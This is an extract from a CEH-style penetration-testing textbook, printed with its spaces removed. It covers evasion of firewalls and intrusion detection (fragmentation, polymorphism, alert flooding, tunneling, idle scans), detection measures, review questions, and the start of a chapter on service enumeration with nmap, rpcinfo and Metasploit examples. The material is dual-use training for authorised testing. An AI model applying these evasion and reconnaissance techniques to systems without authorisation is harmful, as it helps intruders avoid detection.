211192.168.86.57.18294>184.159.210.190.17766:SR1400140884:1400140908(24)ack1802781559win14416urg21625[delay0.001ms]192.168.86.57.43460>184.159.210.190.4433:S2873730507:2873730507(0)win29200192.168.86.57.21314>184.159.210.190.29050:S810642531:810642543(12)ack1802326352win27514[delay0.001ms]192.168.86.57.43460>184.159.210.190.4433:S2873730507:2873730507(0)win29200192.168.86.57.19306>184.159.210.190.22387:R1297315948:1297315960(12)ack2020107846win19767urg31041[delay0.001ms]192.168.86.57.43460>184.159.210.190.4433:S2873730507:2873730507(0)win29200192.168.86.57.26963>184.159.210.190.21350:SFP1950696520:1950696548(28)win27988urg20558[delay0.001ms]Whatyouwilllikelynoticewhenyouusefragrouteisthatwhatyouaretryingtodotointeractwiththetargetwillfail.Intheprecedingexample,Iusedopenssls_clientto­initiateaconnectionwiththewebserverusingSSL/TLS.Theconnectionnevercompleted,presumablybecausethepacketsgettingtothetargetweresomangledandoutoforderthatthenetworkstackdidn’tknowwhattomakeofthem.Thepointofrunningfragroute,though,isn’tnecessarilytomaketheconnection.Sometimes,thepointisjusttoseeifyoucanmakethenetworkstackonthetargetsystemfail,whichmaytakethekernelwithit,causingtheentiresystemtobeunavailable,forcingarebootorrestart.EvasionTechniquesAnytargetorganizationyoutestagainstwillhavesecuritymechanismsinplacetodefenditself.Thismaybefirewallsorintrusiondetectionsystems.Itmayalsohaveintrusionpreventionsystems.Anyofthesecouldthwartyoureffortsbyeitherblockingthemorbyissuinganalert,whichmayresultinthediscoveryofyouractions.Eitherofthesewouldbebadthings.Fortunately,therearesomeevasiontechniquesthatmayhelpyougetaroundthesedevicessoyoucankeeppluggingalong.Someofthetoolswehavealreadylookedatwillhelpyouwiththeseevasiveprocedures.Thecommonevasiontechniquesareasfollows:Hide/Obscurethe Data  Youcoulduseencryptionorobfuscationtodisguisewhatyouaredoing.Encryptedtrafficcan’tbeinvestigatedwithoutviolatingtheend-­to-­endnatureofencryption.Thegoalwithencryptionisthatthemessageisencryptedfrom212 Chapter5  ScanningNetworks■thesendertotherecipient,withoutbeingdecryptedatwaypointsinbetween.Youcouldalsoencodethedatausingvariousencodingtechniques,includingURLencoding,whichreplacescharacterswiththehexadecimalvalueoftheirASCIIcode.Alterations  Intrusiondetection/protectionsystemsinparticularwilloftenusesomethingcalledasignature.Inthecaseofmalware,thismaybeacryptographichashvaluethatcanbecomparedagainstadatabaseofknownmalware.Ifthereisamatchofthehash,themessagescangetdropped.Whenitcomestoacryptographichash,though,thechangeofasinglecharacterinthefilecontentswillyieldacompletelydifferenthashvalue,meaningwhateveryouaredoingwon’tgetdetected.Thisstrategyiscommonlycalledpolymorphisms,frompolymorph,meaningmanyshapesorforms.Fragmentation  Fragmentationattackscanbeusedtoevadenetworksecuritymechanismssimplybecausethesedevices,whentheyareinline,wouldtaketimetoreassemblethemessagesbeforetheadversarialactivitywouldbeseen.Thisreassemblytakestimeandsosomedevicesjustdon’tbotherbecausethereassemblyanddetectioncanaddlatencytocommunications.Thisdependsonthedeviceanddecisionsmadebythedevelopersofthedevice.Youcanuseatoollikefragroutetohelpyouwiththefragmentation.Overlaps  Whenmessagesarefragmented,itmayhappenateithertheNetworklayerortheTransportlayer,asyousawfromlookingatfragroute.Whenthemessagesneedtobereassembled,allofthepiecesneedtobethereandinasanestatesothepuzzlecanbefitbacktogether.WhenusingTCP,youcanoverlapsequencenumbers.Thisisessentiallythebytecountthathasbeensent.YoumaysendtwoTCPsegmentsthatappeartooccupythesamespaceinthepuzzlebeingputbacktogether.TheIDSandthetargetOSmaydecidetoputthepuzzlebacktogetherdifferently.Thismayhappenifonedecidestofavorthenewerinformationwhiletheotherfavorstheolder.TheOSneedstodecidewhetherthefirstmessagereceivedwasvalidorthelastmessagereceivedwasmorevalid.MalformedData  Protocolsaresetsofrulesabouthowcommunicationsareexpectedtohappen.Ifyouviolatethoserules,youcangetunexpectedresults.Evenifyouaren’tviolatingtherulesbutinsteadaretakingadvantageofloopholes,youcangetsomeusefuldata.ThisiswhynmapusesXmas,FIN,andNULscans.Thebehaviorisunexpected,thoughnottechnicallyillegalfromthestandpointoftheprotocol.Similarly,therearedetailsintheprotocolsthatmaybehandleddifferentlyacrossdifferentnetworkstacks.TheURGpointermaybehandleddifferentlyacrossdifferentoperatingsystems.ThiscouldbeusedtogetaroundanIDSandstillhavethetargetsystemrespondthewayyouwant.Lowand Slow  Fastscanscanbeeasytodetect.Hardertodetectarescansthataretakingplaceoveralongtimeframe.Imagineasinglescanpacketbeingsentonceanhour.Thiscanbeverytime-­consumingtoperform,butwhenyouaretalkingaboutindividualmessages,it’sfarlesslikelythattheIDSorfirewallwouldidentifythemasaportscan.Takingyourtimecanbebeneficial.Youcouldusethenmapthrottlingparametertoreallyslowyourscansdown.EvasionTechniques 213ResourceConsumption  ItmaybepossibletogetdevicestofailopenbyconsumingresourcessuchasCPUormemory.Ifyoucanexhausteitheroftheseresources,itmaybepossibletogetsubsequentmessagestojustpassthroughoncethedevicehasfailed.ScreenBlindness  InthecaseofIDS,thedeviceorsoftwarewillissuealerts.Itisexpectedtherewillbesomeonelookingatthosealerts.Ifyoucangenerateenormousvolumesofalertsfromtrafficyoudon’tcareabout,youcancausethepeoplelookingatthealertstogoscreenblind,meaningtheyjustaren’tseeingtheimportantdetailsanymorebecausetheyareoverwhelmedbywhattheyarelookingfor.Thisway,youcansetupasmokescreenwithalotofbogusalerttrafficandthensendyourrealdatathroughthescreen.Tunneling  Atunnelisawayoftransmittingdatainsidesomethingelse.Forexample,theGenericRoutingEncapsulation(GRE)protocolcancreateatunnelbytakingpacketsandencapsulatingtheminsideGREpackets.ThismakesitlooklikewhatispassingthroughisaGREpacketwhenthereisreallysomethinginthepayload.GREisaprotocolthathasbeendesignedtotunneltrafficincaseswhereyouwanttohandletheroutingonthereceivingendratherthanthesendingend.Otherprotocolshavebeenusedfortunnelingattacks,includingSSH,HTTP,ICMP,andDNS.Thesetunneledattacksrequiresoftwareonthereceivingendthatcanextractthetunneledmessagesandplacethemonthetargetnetwork.Keepinmindthatwithdeviceslikestatefulfirewalls,onceyougetthefirstmessagethrough,subsequentmessagesmaybeallowedbydefaultbecausetheyarepartofanestablishedconnection.Ofcourse,thesetechniquesforevasionhaveallbeenaroundforaverylongtime,soit’spossiblethatthefirewallorIDSvendorknowshowtodetectmostofthem.Thismeansyoumaynotbeabletomaketheevasionswork.Itisstillworthknowingaboutthemandtryingthemtoseeifyoucangetthrough.Therearesomethataremorelikelytoworkthanothers,becausetheydon’trelyonthefirewallorIDSvendor.Encryption,forinstance,shouldalwaysworkbecausethefirewallandIDSsimplycan’tseethedatasincethekeysarenegotiatedbythetwoendpoints.Encryption,though,requiresaserviceonthereceivingendthatunderstandsencryptionandcannegotiatewiththesendingapplication.Anevasiontechniquethatdoesn’trelyontechnicalmeansisoverwhelmingthepersonlookingatthealerts.Thisdoes,though,assumethatthereisn’ttechnologyinplacetoweedouttheextraneousmessages,onlypresentinginterestingalertstotheoperator.nmaphasitsownevasionsbuiltin,toadegree.Therearetheonesthatarementionedearlier,withwhatareessentiallymalformedrequests.Thesearepacketconfigurationsthatsimplyshouldn’texistintherealworld.Theexpectationisthatusingthesepacketconfigurations,thenetworksecurityinplacemaysimplyignorethem.Unfortunately,thesearesowell-­knownthatfirewallsandintrusiondetectionsystemsaremorethancapableofseeingthesemessages.Onethatmaybehardertoseeistheidlescan,whichmakesuseofasystemthatisn’tcommunicatingonthenetwork.ThisallowsnmaptocalculatethecorrectIPidentificationnumberthatshouldbereceivedbasedonthesystemhavingtorespondwithresetmessagestopacketsfromthetarget.214 Chapter5  ScanningNetworks■Thewaytheidlescanworksisthesystemperformingthescanspoofsmessages,makingitlooklikethemessagesarecomingfromanidlesystem.Thereceivingsystemthensendsallresponsestotheidlesystem,whilethescanningsystemperiodicallysendsamessagetotheidlesystemtogetthecurrentIPidentificationvalue.Basedonthis,thesendingsystemcandeterminewhatpacketsmayhavebeenreceivedandsentsincethesendingsystemknowswhatitsentout.Whilethescancanbeeasilyseenbyfirewallsordetectionsystems,whatwon’tbeseeniswherethescanoriginatedfrom.Ifthescannerusesavictim,oridle,systemthathasnothingtodowiththescanner,itwon’tbeclearwhoisactuallyperformingthescan,evenifthefactofthescanispickedup.Theperson,sayyouforinstance,doingthescanwillbehiddenbecausethescanisblind.Protectingand DetectingAllofthisisontheoffensiveside,whereyouwillbelookingforfootholdsorpiecesofinformationyoucanuselater.Onethingtokeepinmindwhenitcomestoworkingwithaclientisyourjobisnotjusttobreakintosystemsandfindweaknesses.Youwillbeexpectedtoproviderecommendationsonhowtokeepotherpeoplefromfollowingthepathsthatyouusedtogetintosystems.Thismeansyounotonlyneedtoknowhowtobreakin,butyoualsoneedtoknowhowtokeepyourselffrombreakingin.Fortunately,whenitcomestoscanning,it’snotthathardtoprotectagainstoratleastdetectactivitieslikeportscans.Theyarenoisy,evenifyouareusingalowandslowapproachwithlongwaitsbetweenpacketsgoingout.Sendingrequeststo1,000portsoveranyperiodoftimeisgoingtobealittlestrange.Whilenmapreferstothemaswell-­knownports,that’sacomparativeterm.Inreality,thereareahandfulofports,considerablylessthan1,000,thatareincommonuse.Let’ssaythatthereare20ports,forthesakeoftheargument,thatyouwouldexpecttoseeonyournetwork,giveneverythingthathappensthere.Thatleaves980portsthatyoushouldneverseemessagesforonyournetwork.Anytimeyouseeanyofthose980portsgettingrequests,muchlessallofthem,somethingisprobablyamiss.Youcanblockallofthattraffic,butyoucanalsodetectit.Thismaybedonewitheitherthefirewalloranetworkintrusiondetectionsystem.Vulnerabilityscannersaresimilarlynoisy.Evenincaseswherethescannerknowstheports/applicationsaheadoftime,therearealotofrequeststhataregoingout.Almostallofthemaregoingtolookbad.Thisiswhereanintrusiondetectionsystemcanhelpout.Youmaynotbeableto,orevenwantto,blocktrafficfromavulnerabilityscannerbecause,inreality,itwillbeoratleastlooklikealegitimaterequest.Youmaybeabletonotice,though,thattherequestsmatchknownvulnerabilities.Networkintrusiondetectionsystemsshouldbeabletodetectthistypeofactivity.Whenitcomestoattackslikepacketcraftingorspoofingattacks,therearewaystoprotectagainsttheseaswell.Perimeterfirewallsshouldbeblockingtrafficthatshouldneverhappen.ThisincludesprivateaddressesfromtheRFC1918space,whicharenot,bySummary 215convention,routableovertheInternet.Ifanaddresscan’tcomeinovertheInternet,anythingwithoneofthoseaddressesthatcomesinfromtheInternetcan’tbelegitimate.Similarly,aspoofingattack,sayfromanidlescan,mayappeartocomefromaninsidehost.Anyaddressthatlivesontheinsideofthenetworkcan’tpossiblyoriginatefromtheoutside,sothoseshouldbeblockedaswell.SummaryScanningwillprovideyouwithawealthofinformationthatwillbenecessaryasyoumoveforwardwithyourtestingandevaluation.Therearedifferenttypesofscanning,however.Asyouarescanning,youwillwanttoidentifyportsthatareopen.Thepurposeofidentifyingopenportsisn’tjusttogetalistofports.Ultimately,youwanttoidentifytheservicesorapplicationsthatarelisteningontheopenports.Toidentifytheseopenports,youwoulduseaportscanner.Themostcommonlyusedportscannerisnmap,whichcanbeusedformorethanjustidentifyingopenports.Itcanalsobeusedtoidentifyapplicationversionsbygrabbingbanners.Also,nmapcanidentifytheoperatingsystemrunningonthetarget.Whilethereareotherportscannersavailable,includingmasscan,whichisusedforhigh-­speedscanning,nmapistheonlyportscannerthathasascriptingenginebuiltintoit.ThescriptingenginefornmapisbasedontheprogramminglanguageLua,butnmapprovideslibrariesthatwillgiveyoueasyaccesstotheinformationnmaphassoyoucanwritescriptstobetteridentifyservicesandalsoperformtestssuchasidentifyingvulnerabilities.Whenyouwritescriptsforthenmapscriptingengine(NSE),youregisterportswithnmapsonmapknowstocallyourscriptwhenitfindstheregisteredporttobeopen.Whilenmapiscommonlyacommand-­lineprogram,thereisalsoaGUIthatactsasafrontendfornmap.Zenmapisaprogramthatwillcallnmapbasedonacommandspecified,butitwillalsoparsetheresults,providingthemtoyouindifferentways.Youcanlookatalltheservicesthatwereidentified.Youcanalsogetalookatatopologyofthenetworkbasedonwhatnmapfinds.WhileyoucanprovidethesamecommandtoZenmapasyoudotonmap,Zenmapwillalsoprovidesomescantypesthatyoucanrun,likeanintensescan.Selectingthescantypewillfillintheneededcommand-­lineparameters.Vulnerabilityscannerswillnotonlylookforvulnerabilities,theywillalsogenerallyperformportscanningaspartoflookingforandidentifyingopenports.Thereareanumberofvulnerabilityscannersavailablecommercially.Veryfewvulnerabilityscannersexistthatareopensource.One,basedononethatisnowcommercial,isOpenVAS.OpenVASwasforkedfromthelastopensourceversionofNessus.Oneofthechallengesofvulnerabilityscannersisthevastamountofworkittakestomaintainthemandkeepthemuptodate,whichisperhapsaprimaryreasonwhythereareveryfewopensourcescanners.Vulnerabilityscanners,likeOpenVASandNessus,usepluginstoperformtests.Theyprobethetargetedhosttoobservebehavioronthehosttoidentifypotentialvulnerabilities.Notallidentifiedvulnerabilitiesarereal,however.Vulnerabilitiesthatareidentifiedbyscannersbutaren’trealarecalledfalsepositives.Afalsenegativewouldbeavulnerabilitythat216 Chapter5  ScanningNetworks■didexistbutwasn’tidentified.Vulnerabilityscannersarefarfrominfalliblebecauseofthewaytheywork.Itmayrequiremanualworktovalidatethefindingsfromavulnerabilityscanner.Totestvulnerabilitiesandalsoperformscans,youmayneedtodosomethingotherthanrelyingontheoperatingsystemtobuildyourpacketsforyou.Therearemultipletoolsthatyoucanusetocraftpackets,suchashping.Thisisatoolthatcanbeusedforscanningbutalsocanbeusedtocreatepacketsusingcommand-­lineswitches.Ifyouwouldprefernottousethecommandline,youcanuseatoollikepackETH.packETHpresentsyouwithalltheheadersatlayers2through4.Youcanalsocreateapayloadtogointhepacket.packETHwillalsoletyouextractpacketsfromaPCAPandthenmakechangestoit.Youcansendindividualpacketstoatarget—­eitherlayer2orlayer3—­oryoucouldsendstreams.Usingthesecraftedpackets,youcangetresponsesfromyourtargetthatmayprovideyouwithnecessaryinformation.YourtargetnetworkswilllikelyhavefirewallsandanIDSinstalled.Youwillprobablywanttousetechniquestoevadethosedevicessincetheywilllikelypreventyoufromdoingyourjob.Therearemultiplewaystoevadesecuritytechnologies,includingencryption/encoding,causingtheoperatortogoscreenblind,orsendingmalformedmessagestothetarget.Thebestwaytoprotectagainstthesescans,whethertheyareportscansorvulnerabilityscans,istousefirewallsontheingressofnetworks,whichincludesnetworksegmentslikeavirtuallocalareanetwork.Youmaynotalwaysbeabletoprotectagainst,meaningblock,allofthesetactics.ThisiswhereanIDScomesinhandy,toletsomeoneknowsomethingbadishappening.ReviewQuestions 217ReviewQuestionsYoucanfindtheanswersintheappendix.1.IfyoureceiveaRSTpacketbackfromatargethost,whatdoyouknowaboutyourtarget?A.ThetargetisusingUDPratherthanTCP.B.Thedestinationportisopenonthetargethost.C.ThesourceportintheRSTmessageisclosed.D.ThetargetexpectsthePSHflagtobeset.2.WhatisthedifferencebetweenaSYNscanandafullconnectscan?A.ASYNscanandafullconnectscanarethesame.B.AfullconnectscansendsanACKmessagefirst.C.ASYNscanusesthePSHflagwiththeSYNflag.D.TheSYNscandoesn’tcompletethethree-­wayhandshake.3.WhatisonereasonaUDPscanmaytakelongerthanaTCPscanofthesamehost?A.UDPwillretransmitmore.B.UDPhasmoreportstoscan.C.UDPisaslowerprotocol.D.UDPrequiresmoremessagestosetup.4.WhydoesanACKscannotindicateclearlythatportsareopen?A.Thescannerhastoguess.B.ACKisnotasupportedflag.C.Thetargetsystemignoresthemessage.D.ACKscanscausealotofretransmits.5.WhatisonereasonforusingascanlikeanACKscan?A.ItmaygetthroughfirewallsandIDSdevices.B.Itisbettersupported.C.Thecodeinnmapismorerobust.D.AnACKscanisneededforscriptingsupport.6.Whatdoesnmaplookatforfingerprintinganoperatingsystem?A.TheoperatingsystemheadersB.TheapplicationversionC.Theresponsefromconnectingtoport0D.TheIPIDfieldandtheinitialsequencenumber218 Chapter5  ScanningNetworks■7.Whatisnmaplookingatwhenitconductsaversionscan?A.TCPandIPheadersB.ApplicationbannersC.OperatingsystemkernelD.IPIDandTCPsequencenumberfields8.Whatisanadvantageofusingmasscanovernmap?A.masscanhasbeenaroundlonger.B.nmapishardtouse.C.masscancanscanmoreaddressesfaster.D.masscanhasaccesstoscanmoreoftheInternet.9.Ifyouweretoseehping-­S-­p 2510.5.16.2,whatwouldyouassume?A.Someonewastryingtoprobethewebportofthetarget.B.Someonewastryingtoprobeanemailportonthetarget.C.SomeonewastryingtoidentifyifSNMPwassupportedon10.5.16.2.D.Someonehadmistypedping.10.IfyouweretoseethatsomeonewasusingOpenVAS,followedbyNessus,whatmightyouassume?A.Theyweretryingtobreakintoasystem.B.Theydidn’tknowhowtouseNessus.C.Theydidn’tknowhowtouseOpenVAS.D.Theyweretryingtoreducefalsepositives.11.Whatisthedifferencebetweenafalsepositiveandafalsenegative?A.Afalsepositiveindicatesafindingthatdoesn’texist,whileafalsenegativedoesn’tindicateafindingthatdoesexist.B.Afalsepositiveindicatesafindingthatdoesexist,whileafalsenegativedoesn’tindicateafindingthatdoesn’texist.C.Afalsepositivedoesn’tindicateafindingthatdoesexist,whileafalsenegativedoesindicateafindingthatdoesn’texist.D.Afalsenegativedoesindicateafindingthatdoesn’texist,whileafalsepositivedoesn’tindicateafindingthatdoesexist.12.Whatwouldbethepurposeofrunningapingsweep?A.Youwanttoidentifyresponsivehostswithoutaportscan.B.Youwanttousesomethingthatislightonnetworktraffic.C.Youwanttouseaprotocolthatmaybeallowedthroughthefirewall.D.Alloftheabove.ReviewQuestions 13.Whichofthesemaybeconsideredworstpracticewhenitcomestovulnerabilityscans?A.ScanningproductionserversB.NotifyingoperationsstaffaheadoftimeC.TakingnoactionontheresultsD.Usinglimiteddetailsinyourscanreports14.Whichofthesemaybeconsideredanevasivetechnique?A.ScanningnonstandardportsB.EncodingdataC.UsingaproxyserverD.Usingnmapinblindmode15.IfyouweretonoticeoperatingsystemcommandsinsideaDNSrequestwhilelookingatapacketcapture,whatmightyoubelookingat?A.TunnelingattackB.DNSamplificationC.DNSrecursionD.XMLentityinjection16.WhatisanXmasscan?A.TCPscanwithSYN/ACK/FINsetB.UDPscanwithFIN/PSHsetC.TCPscanwithFIN/PSH/URGsetD.UDPscanSYN/URG/FINset17.WhatwouldyouuseMegaPingfor?A.RunningexploitsB.RunningaportscanC.IssuingmanualwebrequestsD.Craftingpackets18.WhatwouldbeareasontousetheOverridefeatureinOpenVAS?A.Youwanttorunadifferentpluginforavulnerability.B.Youwanttochangethescannersettings.C.YouwanttouseTCPratherthanUDP.D.Youwanttochangeaseverityratingonafinding.19.Whatwouldyouusecredentialsforinavulnerabilityscanner?A.BetterreliabilityinnetworkfindingsB.AuthenticatingthroughVPNsforscans219220 Chapter5  ScanningNetworks■C.ScanningforlocalvulnerabilitiesD.RunninganActiveDirectoryscan20.Whatisfragrouteprimarilyusedfor?A.AlteringnetworkroutesB.CapturingfragmentedpacketsC.FragmentingapplicationtrafficD.Fragmentinglayer2andlayer3headersChapter6EnumerationTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Technicalassessmentmethods✓✓Networksecurity✓✓Vulnerabilities✓✓Application/fileserverPortscanningisultimatelyaboutidentifyingapplicationsthatareinstalledonsystemswithinthetargetnetwork.Oncewehaveidentifiedapplications,though,wewillwanttodigdeepertoseewhatadditionalinformationwecanextract.Thismayincludeuserinformationordetailsaboutsharesthatmaybeavailableonthenetwork.Ofcourse,thereareotheractivitieswecanperformwhenwestartworkingonenumeration.Thisinformationgatheringwillbebeneficialwhenwestartmovingtothenextstages.Enumerationisaboutdeterminingwhatservicesarerunningandthenextractinginformationfromthoseservices.Thefirstthingyouneedtodoisidentifyservicesthatareavailableonyourtargetsystems.Eachservicemayhavealotofinformationthatcanbeobtained.External-­facingservicesmayhaveauthenticationrequirements,whichmeansthereareusers.Asanexample,usersmayhavetobeauthenticatedandauthorizedtoviewsomesectionsonawebserver.Youmaybeabletogetthewebservertogiveyouanindicationwhatusernamesareconfiguredontheserver,whichwouldbeanexampleofenumeration.Becauseweareworkingonenumeration,wearegoingtotakeacloselookatafewprotocolsaswellasthetoolsyouwouldusewiththoseprotocols.Forastart,thereistheServerMessageBlock(SMB)protocol.ThisisusedonWindowssystemsforfileandresourcesharingaswellassomeremotemanagement.Thisisdefinitelyacasewhereuserswouldhavetoauthenticateagainsttheservice,sowecanspendsometimetryingtofindusersonWindowsservers.Additionally,youmaybeabletoidentifysecuritypolicyinformationassociatedwiththeWindowsdomain.Certainly,youshouldbeabletoidentifyfileshareswheretherearesome.OtherprotocolsyoumaynotthinkaboutwhenitcomestoenumerationaretheSimpleMailTransferProtocol(SMTP)andtheSimpleNetworkManagementProtocol(SNMP).It’scommonforuserstohavetoauthenticateandbeauthorizedbeforesendingemailthroughanSMTPserver,particularlyiftheyaresendingfromoutsidethenetworkwherethemailserveris.IfyouuseatraditionalmailclienttoconnectwithGmailorOffice365,youarefamiliarwithhavingtoprovideyourusernameandpasswordforyourSMTPserver.Yourclientmayautomaticallyfillthatinformationinforyou,butit’sthereifyougolookingatsettings.SNMPcanprovidealotofinformationaboutsystems.IfyoucangetaccesstoanSNMPsystem,youshouldbeabletowalkthemanagementinformationbase(MIB)toextractdetailsfromyourtargetsystem.Therearetoolsthatwillperformthiswalkforyou,retrievingtheinformationandpresentingittoyou.TheMITREATT&CKFrameworkcategorizesenumerationundertheReconnaissancephase.ItcurrentlyidentifiesGatherVictimHostInformationandGatherVictimIdentityInformationastwotechniquesthatwouldbroadlyfitintotheenumerationcategory.ServiceEnumeration 223Bythetimewearedonewiththischapter,youshouldhaveasolidunderstandingofwhatenumerationisaswellaswhattoolsyoucanusetoenumeratedifferentresourcesonsystems.ManyofthesetoolswillbeLinux-­basedandrunfromthecommandline,buttherearesomeWindowstoolswe’lllookataswell.ServiceEnumerationWhenyouarescanningsystems,nmapisalwaysyourfriend.Thesameistruewhenitcomestoserviceenumeration.Thismeansyouareidentifyingtheservicerunningonthetargetsystem.Aquickwaytodothatistousetheversionscanbuiltintonmap.Inthefollowingcodelisting,youcanseeaportionofoutputfromaversionscanrunbynmaponhostsonmynetwork.Aversionscanisperformedbyusing-­sVastheparametersenttonmap.Itshowsnotjustopenportsbutalsowhereitcanfindthemandspecificsabouttheservicesandversionsthatarerunningonthehoststhatwerefoundrespondingonthenetwork.Itdoesthisbylookingatanyapplicationbannerstoextractdetailsabouttheservicenameandversion.NmapVersionScanPORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.7p1Debian3(protocol2.0)25/tcpclosedsmtp80/tcpopenhttpGreenboneSecurityAssistant443/tcpclosedhttpsMACAddress:0E:76:03:B8:2A:BA(Unknown)ServiceInfo:OS:Linux;CPE:cpe:/o:linux:linux_kernelNmapscanreportfordesktop-­3rgc5h2.lan(192.168.86.60)Hostisup(0.025slatency).PORTSTATESERVICEVERSION22/tcpfilteredssh25/tcpfilteredsmtp80/tcpfilteredhttp443/tcpfilteredhttpsMACAddress:C4:9D:ED:AB:DD:7A(Microsoft)Nmapscanreportformilobloom.lan(192.168.86.61)Hostisup(0.94slatency).224 Chapter6  Enumeration■PORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.6(protocol2.0)25/tcpclosedsmtp80/tcpclosedhttp443/tcpclosedhttpsMACAddress:B8:09:8A:C7:13:8F(Apple)Asyoucansee,notallservicesprovidedetailsaboutwhattheyare.Wecanidentifytheservicebutnottheapplicationortheversioninmostcases.OnethingwecanseeinthepreviouslistingisahandfulofsystemsthatarerunningSecureShell(SSH).NotalloftheSSHserversprovidedversionsorevenprotocols.Fortunately,wecanmakeuseofnmapagainformoredetailsaboutSSH.nmaphasscriptingcapabilities,andtherearealotofscriptsthatwillenumerateservicesformoredetails.OneofthesescriptswillenumeratealgorithmsthataresupportedbytheSSHserver.SSHencryptsdatabetweentheclientandtheserver,buttheciphersuitesusedmayvarybetweenconnections,sinceclientscansupportdifferentkeystrengthsandalgorithms.HereyoucanseetheuseofthescriptusedtoenumeratethealgorithmsacrossSSHservers,ssl-­enum-­ciphers.nse.SSH2AlgorithmEnumerationPORTSTATESERVICE22/tcpopenssh|ssh2-­enum-­algos:|kex_algorithms:(10)|curve25519-­sha256|curve25519-­[email protected]|ecdh-­sha2-­nistp256|ecdh-­sha2-­nistp384|ecdh-­sha2-­nistp521|diffie-­hellman-­group-­exchange-­sha256|diffie-­hellman-­group16-­sha512|diffie-­hellman-­group18-­sha512|diffie-­hellman-­group14-­sha256|diffie-­hellman-­group14-­sha1|server_host_key_algorithms:(5)|ssh-­rsa|rsa-­sha2-­512|rsa-­sha2-­256|ecdsa-­sha2-­nistp256|ssh-­ed25519|encryption_algorithms:(6)|chacha20-­[email protected]ServiceEnumeration 225|aes128-­ctr|aes192-­ctr|aes256-­ctr|aes128-­[email protected]|aes256-­[email protected]|mac_algorithms:(10)|umac-­64-­[email protected]|umac-­128-­[email protected]|hmac-­sha2-­256-­[email protected]|hmac-­sha2-­512-­[email protected]|hmac-­sha1-­[email protected]|umac-­[email protected]|umac-­[email protected]|hmac-­sha2-­256|hmac-­sha2-­512|hmac-­sha1|compression_algorithms:(2)|none|_[email protected]MACAddress:0E:76:03:B8:2A:BA(Unknown)Youwillseeacollectionofalgorithmtypesintheoutput.Thefirstsetofalgorithmsisforkeyexchange.OneofthemistheDiffie-­Hellmanalgorithm,namedforWhitfieldDiffieandMartinHellman,whowerethefirsttopublishanalgorithmforkeyexchange.Thekeyexchangealgorithmisimportantbecausethekeyisessentialforencryption,anditisgeneratedatthetimeaconnectionismade.Youcanalsoseetheencryptionalgorithmslisted.MostofthesearetheAdvancedEncryptionStandard(AES),thoughyou’llnoticeoneisnamedChaCha20.ThisisastreamcipherlikeAESthatcanallowprogramstouseencryptionwithouttheneedforanopensourceencryptionlibrary.Finally,thereisthemessageauthenticationcode,usedtoensurethatthemessagewasn’ttamperedwithorcorrupted.DiffieandHellmanwerethefirsttopublishakeyexchangealgorithm,buttheywerenotthefirsttodevelopone.GovernmentintelligenceagencieshadalreadycomeupwithkeyexchangealgorithmsseparatelyfromDiffieandHellman.Thedifferencewasthattheagencyemployeeswereunabletopublishbecausetheirworkcouldn’tbedisclosedoutsidetheagency.Certainlynmapcanprovideyouwithagoodstartongettingalistofservicesandversionnumbers,butit’snotalwaysenough.Thereismuchmorethatcanbeacquiredaboutdifferentservices.Thisisanareathatnmapcanhelpwiththroughtheuseofscriptsthatareinstalledwithnmap.Thesescriptscanbeusedtoextractalotofinformation,likethealgorithmsinSSH,thatareotherwisedifficulttoattain.SSHmayprovideencryptionservices,226 Chapter6  Enumeration■butnotalloftheencryptionalgorithmsarefreefromvulnerabilities.Thisiswhyitcanbeusefultoknoweverythingaboutservices.Youneverknowwhereyoumayrunacrossavulnerability.RemoteProcedureCallsAremoteprocedurecall(RPC)isaservicethatallowsremotesystemstoconsumeproceduresexternaltotheapplicationcallingthem.AprogramonsystemAcancallafunctionorprocedureonanothersystemacrossthenetwork.ItdoesthisusingtheRPCprotocol.Asfarastheprogramonthelocalcomputercallingtheremoteprocedureisconcerned,it’salocalprocedureexistinginthesameprocessspaceastherestofthecode.Theprogramcallsthisprocedure,getstheinformation,andproceedsonitsmerryway.RPCsprovideawayfortwoprocessestocommunicatewithoneanother.Remotecommonlymeansaremoteserver,buttwolocalprocessescouldalsouseRPCstocommunicatewithoneanother.SunRPCTheideaofinterprocesscommunicationhasbeenaroundfordecades.Therehavebeenseveralimplementationsofrequest-­responseprotocolsoverthedecades.Java’sremotemethodinvocation(RMI)isarecentexampleofthis.Beforethat,therewastheCommonObjectRequestBrokerArchitecture(CORBA),whichwasindependentoflanguageimplementation.Sometimes,withRPCs,youneedwhatisessentiallyadirectoryservicetoindicatethedynamicportsonwhichdifferentservicesarerunning.Acommonimplementationofremoteprocedurecallsistheprogramportmap,alsoknownasrpcbind.Thisprogramisusedtoprovideinformationaboutprogramsthathavebeenregisteredwiththeportmapperservice,providingtheseremoteprocedures.Theportmapperassignsaportfortheservicetolistenonand,whenqueried,canprovidethatinformationback.Commonexamplesofservicesthatuserpcbind/portmaparefilesharingserverslikeNetworkFileServer(NFS).ThepackagethatprovidestheportmaporrpcbindservicemayalsoprovideutilitiesthatcanalsocommunicateusingRPC.Thisisdoneoverport111.Toidentifyprogramsandassociatedportsonaremotesystem,youcanusetheprogramrpcinfo.Youcanseeanexampleoftheuseofrpcinfoshownhere.Thecommandused,rpcinfo-­p,hasrpcinfoprobethehostprovided.Inthiscase,thehostisanIPaddressratherthanahostname.rpcinfoList[email protected]$rpcinfo-­p192.168.86.52programversprotoportservice1000004tcp111portmapper1000003tcp111portmapper RemoteProcedureCalls 100000100000100000100000100005100005100005100005100005100005100003100003100227100003100227100021100021100021100021100021100021243211223334333134134tcpudpudpudpudptcpudptcpudptcptcptcptcpudpudpudpudpudptcptcptcp11111111111143939588014638450405490305055320492049204920492049345783457834578392973929739297227portmapperportmapperportmapperportmappermountdmountdmountdmountdmountdmountdnfsnfsnfs_aclnfsnfs_aclnlockmgrnlockmgrnlockmgrnlockmgrnlockmgrnlockmgrTheprogramsshownearlierthathaveremoteproceduresregisteredwithrpcbindareassociatedwiththeNFSfilesharingserver.Theprogramportmapperistheprimaryservicethatisqueriedforadditionaldata,buttheothers,likemountd,nfs,andnlockmanager,areallneededforNFS.NFSwasdevelopedbySunMicrosystems.TheportmapperisanimplementationofRPCthatwasalsoassociatedwithSun.YoumaysometimesseeitreferredtoasSunRPC.ThisisthecasewithascannerinMetasploitthatcanalsobeusedtoidentifytheportsallocatedtoprogramsusingtheportmapper.MetasploitsunrpcScannermsf>useauxiliary/scanner/misc/sunrpc_portmappermsfauxiliary(scanner/misc/sunrpc_portmapper)>setRHOSTS192.168.86.52RHOSTS=>192.168.86.52msfauxiliary(scanner/